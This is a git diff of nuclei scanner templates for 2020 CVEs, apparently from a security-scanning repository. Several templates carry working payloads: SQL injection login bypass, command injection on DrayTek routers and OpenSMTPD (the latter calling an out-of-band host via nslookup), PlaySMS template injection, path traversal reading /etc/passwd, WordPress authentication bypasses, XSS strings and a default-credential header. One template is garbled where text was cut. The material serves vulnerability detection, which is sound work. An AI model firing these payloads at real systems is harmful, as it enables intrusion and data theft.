page and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the Jenkins server. + remediation: | + Upgrade Jenkins to a version higher than 2.218 to mitigate the vulnerability. + reference: + - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 + - https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 + - http://www.openwall.com/lists/oss-security/2020/01/29/1 + - https://nvd.nist.gov/vuln/detail/CVE-2020-2103 + - https://access.redhat.com/errata/RHBA-2020:0402 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-2103 + cwe-id: CWE-200 + epss-score: 0.00534 + epss-percentile: 0.76681 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* + metadata: + max-request: 2 + vendor: jenkins + product: jenkins + shodan-query: http.favicon.hash:81586312 + tags: cve,cve2020,jenkins + +http: + - raw: + - | + GET {{BaseURL}}/whoAmI/ HTTP/1.1 + Host: {{Hostname}} + - | + GET {{BaseURL}}/whoAmI/ HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'text/html' + - 'x-jenkins' + case-insensitive: true + condition: and + + - type: word + part: body_2 + words: + - 'Cookie' + - 'SessionId: null' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - x_jenkins +# digest: 490a0046304402204719e69a3d9212bc5a83bc0637aa260c0f1a472289337a06a0795d661772b79a02203d747ba49dfc9831db6ee04e4a534db4d514e8afd98b86e178e116bf4de12837:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-22209.yaml b/nuclei-templates/CVE-2020/cve-2020-22209.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-22209.yaml rename to nuclei-templates/CVE-2020/cve-2020-22209.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-22840.yaml b/nuclei-templates/CVE-2020/cve-2020-22840.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-22840.yaml rename to nuclei-templates/CVE-2020/cve-2020-22840.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-23015.yaml b/nuclei-templates/CVE-2020/cve-2020-23015.yaml new file mode 100644 index 0000000000..ffed6c574a --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-23015.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-23015 + +info: + name: OPNsense 20.1.5. Open Redirect + author: 0x_Akoko + severity: medium + description: An open redirect issue was discovered in OPNsense through 20.1.5. The redirect parameter "url" in login page was not filtered and can redirect user to any website. + reference: + - https://github.com/opnsense/core/issues/4061 + - https://www.cvedetails.com/cve/CVE-2020-23015 + tags: cve,cve2020,redirect,opnsense + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-23015 + cwe-id: CWE-601 + +requests: + - method: GET + + path: + - '{{BaseURL}}/?url=http://example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-23517.yaml b/nuclei-templates/CVE-2020/cve-2020-23517.yaml new file mode 100644 index 0000000000..ddd98b74b9 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-23517.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-23517 + +info: + name: Aryanic HighMail (High CMS) XSS + author: geeknik + severity: medium + description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. + reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html + tags: xss,cve,cve2020 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-23517 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/login/?uid=\">" + + matchers-condition: and + matchers: + - type: word + words: + - text/html + part: header + - type: word + words: + - "%25xxe%3b]> + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - "Failed to install the generic artifact type" diff --git a/nuclei-templates/CVE-2020/CVE-2020-25223.yaml b/nuclei-templates/CVE-2020/cve-2020-25223.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-25223.yaml rename to nuclei-templates/CVE-2020/cve-2020-25223.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-2551.yaml b/nuclei-templates/CVE-2020/cve-2020-2551.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-2551.yaml rename to nuclei-templates/CVE-2020/cve-2020-2551.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-26073.yaml b/nuclei-templates/CVE-2020/cve-2020-26073.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-26073.yaml rename to nuclei-templates/CVE-2020/cve-2020-26073.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-26876.yaml b/nuclei-templates/CVE-2020/cve-2020-26876.yaml index 2fdc04789f..6559ee1788 100644 --- a/nuclei-templates/CVE-2020/cve-2020-26876.yaml +++ b/nuclei-templates/CVE-2020/cve-2020-26876.yaml @@ -1,41 +1,32 @@ id: CVE-2020-26876 - info: name: WordPress WP Courses Plugin Information Disclosure author: dwisiswant0 severity: high description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials. + tags: wordpress,plugin reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-26876 - https://www.exploit-db.com/exploits/48910 - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ - - https://plugins.trac.wordpress.org/changeset/2388997 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 cve-id: CVE-2020-26876 - cwe-id: CWE-306 - tags: cve,cve2020,wordpress,wp-plugin,exposure,edb - requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/lesson/1" - matchers-condition: and matchers: - type: regex - part: body regex: - "rest_post_invalid_id" - "\"(guid|title|content|excerpt)\":{\"rendered\":" condition: or - + part: body - type: word - part: header words: - "application/json" - + part: header - type: status status: - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-28351.yaml b/nuclei-templates/CVE-2020/cve-2020-28351.yaml new file mode 100644 index 0000000000..62ede841c5 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-28351.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-28351 + +info: + name: ShoreTel 19.46.1802.0 XSS + author: pikpikcu + severity: medium + description: conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page + reference: + - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 + tags: cve,cve2020,shoretel,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-28351 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header diff --git a/nuclei-templates/CVE-2020/cve-2020-35338.yaml b/nuclei-templates/CVE-2020/cve-2020-35338.yaml new file mode 100644 index 0000000000..205fad22a0 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-35338.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-35338 + +info: + author: Jeya Seelan + severity: critical + name: Default Credentials of WMT Server + description: The Web Administrative Interface in Mobile Viewpoint Wireless Multiplex Terminal (WMT) Playout Server 20.2.8 and earlier has a default account with a password of pokon. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-35338 + - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa + tags: cve,cve2020,wmt,default-login + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35338 + cwe-id: CWE-798 +requests: + - method: GET + path: + - "{{BaseURL}}/server/" + headers: + Authorization: "Basic OnBva29u" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "WMT Server playout" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-35713.yaml b/nuclei-templates/CVE-2020/cve-2020-35713.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-35713.yaml rename to nuclei-templates/CVE-2020/cve-2020-35713.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35749.yaml b/nuclei-templates/CVE-2020/cve-2020-35749.yaml new file mode 100644 index 0000000000..1145fee9cb --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-35749.yaml @@ -0,0 +1,55 @@ +id: CVE-2020-35749 + +info: + name: WordPress Simple Job Board <2.9.4 - Local File Inclusion + author: cckuailong + severity: high + description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise. + remediation: | + Update to WordPress Simple Job Board version 2.9.4 or later to fix the vulnerability. + reference: + - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d + - https://nvd.nist.gov/vuln/detail/CVE-2020-35749 + - https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharing + - http://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.7 + cve-id: CVE-2020-35749 + cwe-id: CWE-22 + epss-score: 0.02144 + epss-percentile: 0.88116 + cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: presstigers + product: simple_board_job + framework: wordpress + tags: cve,cve2020,authenticated,packetstorm,wp,lfi,wordpress,wp-plugin,wpscan,presstigers + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 490a0046304402205aa1631c11bb3beabb3041432b1abbac3a39611e4086b7f525da85e83f48fc0002205cdd1e5fdfa1abe2fd05dd3722e4975de5913462464aaf925db798da8eac1374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-3580.yaml b/nuclei-templates/CVE-2020/cve-2020-3580.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-3580.yaml rename to nuclei-templates/CVE-2020/cve-2020-3580.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-35951.yaml b/nuclei-templates/CVE-2020/cve-2020-35951.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-35951.yaml rename to nuclei-templates/CVE-2020/cve-2020-35951.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-36287.yaml b/nuclei-templates/CVE-2020/cve-2020-36287.yaml deleted file mode 100644 index 4744134944..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-36287.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: cve-2020-36287 - -info: - name: Jira Dashboard Gadgets / Information Disclosure - author: Jafar_Abo_Nada - severity: medium - description: The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. - tags: cve,cve2020,jira,atlassian,disclosure - reference: | - - https://twitter.com/Jafar_Abo_Nada/status/1386058611084890116 - - https://nvd.nist.gov/vuln/detail/CVE-2020-36287 - - # On a vulnerable instance, iterate through gadget ID from 10000 to 19999 to get exposed information /rest/dashboards/1.0/10000/gadget/{{id}}/prefs - -requests: - - raw: - - | - GET /rest/dashboards/1.0/10000/gadget/10000/prefs HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - - | - GET /rest/dashboards/1.0/10000/gadget/10001/prefs HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - - "contains(body_1, '<userPrefsRepresentation>')" - - "status_code_2 != 401" - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-36365.yaml b/nuclei-templates/CVE-2020/cve-2020-36365.yaml deleted file mode 100644 index 771c887368..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-36365.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2020-36365 - -info: - name: Smartstore < 4.1.0 - Open redirect - author: 0x_Akoko - severity: medium - description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect. - reference: - - https://github.com/smartstore/SmartStoreNET/issues/2113 - - https://www.cvedetails.com/cve/CVE-2020-36365 - - https://github.com/smartstore/SmartStoreNET - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-36365 - cwe-id: CWE-601 - metadata: - shodan-query: http.html:'content="Smartstore' - tags: cve,cve2020,redirect,smartstore - -requests: - - method: GET - - path: - - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2020/cve-2020-5307.yaml b/nuclei-templates/CVE-2020/cve-2020-5307.yaml new file mode 100644 index 0000000000..160406214c --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-5307.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-5307 + +info: + name: Dairy Farm Shop Management System - SQL Injection + author: gy741 + description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. + reference: + - https://cinzinga.com/CVE-2020-5307-5308/ + severity: critical + tags: cve,cve2020,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5307 + cwe-id: CWE-89 + +requests: + - raw: + - | + POST /dfsms/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login= + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "add-category.php" + + - type: status + status: + - 302 diff --git a/nuclei-templates/CVE-2020/cve-2020-7247.yaml b/nuclei-templates/CVE-2020/cve-2020-7247.yaml new file mode 100644 index 0000000000..f04736b5ce --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-7247.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-7247 +info: + name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution + author: princechaddha + severity: critical + reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 + tags: cve,cve2020,smtp,opensmtpd,network,rce,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7247 + cwe-id: CWE-78,CWE-755 + description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation." + +network: + - inputs: + - read: 1024 + - data: "helo target\r\n" + read: 1024 + - data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n" + read: 1024 + - data: "RCPT TO:<root>\r\n" + read: 1024 + - data: "DATA\r\n" + read: 1024 + - data: "\r\nxxxx\r\n.\r\n" + read: 1024 + - data: "QUIT\r\n" + read: 1024 + host: + - "{{Hostname}}" + - "{{Host}}:25" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: raw + words: + - "Message accepted for delivery" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-7943.yaml b/nuclei-templates/CVE-2020/cve-2020-7943.yaml new file mode 100644 index 0000000000..c2bedd5d86 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-7943.yaml @@ -0,0 +1,51 @@ +id: CVE-2020-7943 + +info: + name: Puppet Server/PuppetDB - Sensitive Information Disclosure + author: c-sh0 + severity: high + description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information stored in Puppet Server/PuppetDB. + remediation: | + Apply the necessary patches or updates provided by Puppet to fix the vulnerability and ensure sensitive information is properly protected. + reference: + - https://puppet.com/security/cve/CVE-2020-7943 + - https://tickets.puppetlabs.com/browse/PDB-4876 + - https://puppet.com/security/cve/CVE-2020-7943/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-7943 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-7943 + cwe-id: CWE-276,NVD-CWE-noinfo + epss-score: 0.08068 + epss-percentile: 0.93691 + cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: puppet + product: puppet_enterprise + tags: cve2020,cve,puppet,exposure,puppetdb + +http: + - method: GET + path: + - "{{BaseURL}}/metrics/v1/mbeans" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "trapperkeeper" + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 +# digest: 4a0a0047304502206792db6fdd8e464da8351b87ddbba9a963f88f46d4f033c091fe6c389244575d022100fba0ea89c7927a275a26e5c8af022bbc1396176d3062c626ebf54a7fd9215679:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-7980.yaml b/nuclei-templates/CVE-2020/cve-2020-7980.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-7980.yaml rename to nuclei-templates/CVE-2020/cve-2020-7980.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-8515.yaml b/nuclei-templates/CVE-2020/cve-2020-8515.yaml new file mode 100644 index 0000000000..05ec699777 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8515.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-8515 + +info: + name: DrayTek pre-auth RCE + author: pikpikcu + severity: critical + description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1. + reference: + - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) + - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ + tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8515 + cwe-id: CWE-78 + +requests: + - raw: + - | + POST /cgi-bin/mainfunction.cgi HTTP/1.1 + Host: {{Hostname}} + + action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8644.yaml b/nuclei-templates/CVE-2020/cve-2020-8644.yaml index 6d66fa8fa8..aae9417521 100644 --- a/nuclei-templates/CVE-2020/cve-2020-8644.yaml +++ b/nuclei-templates/CVE-2020/cve-2020-8644.yaml @@ -5,24 +5,36 @@ info: author: dbrwsky severity: critical description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. + remediation: | + Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability. reference: - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 + - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html + - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8644 - cwe-id: CWE-74 - tags: cve,cve2020,ssti,playsms,rce,unauth,kev + cwe-id: CWE-94 + epss-score: 0.96028 + epss-percentile: 0.99356 + cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: playsms + product: playsms + tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce -requests: +http: - raw: - | GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 Host: {{Hostname}} @@ -31,21 +43,11 @@ requests: X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password= - cookie-reuse: true host-redirects: true max-redirects: 2 - extractors: - - type: xpath - name: csrf - part: body - attribute: value - internal: true - xpath: - - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input matchers-condition: and matchers: - - type: word part: body words: @@ -55,4 +57,12 @@ requests: status: - 200 -# Enhanced by mp on 2022/07/07 \ No newline at end of file + extractors: + - type: xpath + name: csrf + internal: true + xpath: + - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input + attribute: value + part: body +# digest: 4a0a00473045022100de0fd4f3f3ad0fb96410bfb6090044c9b207a545e58487ddd0511778356e78c702202963c19d8dd8b9609b66bad92c7de0ffbe0fb371c60ada6d7cc14bdf04c0a9de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8771.yaml b/nuclei-templates/CVE-2020/cve-2020-8771.yaml new file mode 100644 index 0000000000..6a244c4df1 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8771.yaml @@ -0,0 +1,55 @@ +id: CVE-2020-8771 + +info: + name: WordPress WP Time Capsule Authentication Bypass + author: princechaddha + severity: critical + reference: https://github.com/SECFORCE/WPTimeCapsulePOC + tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8771 + cwe-id: CWE-287 + description: "The Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts." + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept: */* + + IWP_JSON_PREFIX + + - | + GET /wp-admin/index.php HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept: */* + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - '<div id="adminmenumain" role="navigation" aria-label="Main menu">' + - "<h1>Dashboard</h1>" + part: body + condition: and + + - type: word + words: + - 'text/html' + part: header + + - type: status + status: + - 200 + + extractors: + - type: regex + part: header + regex: + - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)" diff --git a/nuclei-templates/CVE-2020/cve-2020-8772.yaml b/nuclei-templates/CVE-2020/cve-2020-8772.yaml index 0036ff439d..beccc40018 100644 --- a/nuclei-templates/CVE-2020/cve-2020-8772.yaml +++ b/nuclei-templates/CVE-2020/cve-2020-8772.yaml @@ -1,19 +1,83 @@ id: CVE-2020-8772 info: - name: InfiniteWP Improper Authentication - author: medbsq + name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass + author: princechaddha,scent2d severity: critical + description: | + WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can gain unauthorized administrative access to the WordPress site. + remediation: Upgrade to InfiniteWP 1.9.4.5 or higher. + reference: + - https://wpscan.com/vulnerability/10011 + - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ + - https://wpvulndb.com/vulnerabilities/10011 + - https://nvd.nist.gov/vuln/detail/CVE-2020-8772 + - https://github.com/ChoiSG/vwp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-8772 + cwe-id: CWE-862 + epss-score: 0.96607 + epss-percentile: 0.99546 + cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: revmakx + product: infinitewp_client + framework: wordpress + tags: cve,cve2020,wpscan,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx -requests: - - method: POST - path: - - "{{BaseURL}}/wp-admin/" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - body: "_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==" +http: + - raw: + - | + GET /?author=1 HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9 + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: application/x-www-form-urlencoded + + _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}} + + host-redirects: true + + matchers-condition: and matchers: - type: word + part: header words: - - "IWPHEADER" - part: head + - "wordpress_logged_in" + + - type: word + part: body + words: + - "<IWPHEADER>" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: username + group: 1 + regex: + - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>' + internal: true + part: body + + - type: regex + name: username + group: 1 + regex: + - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' + internal: true + part: header +# digest: 490a0046304402203291fcf479be6ac8ef870d1f4d03c92df6410ee75121d38addd0c9377d8f40f7022020886d69171d32958ad6b8f1d435f68f1521494a7169dedcee8a8830052aa695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-8982.yaml b/nuclei-templates/CVE-2020/cve-2020-8982.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8982.yaml rename to nuclei-templates/CVE-2020/cve-2020-8982.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-9043.yaml b/nuclei-templates/CVE-2020/cve-2020-9043.yaml index d5ce7f65b4..3a4e5cdd20 100644 --- a/nuclei-templates/CVE-2020/cve-2020-9043.yaml 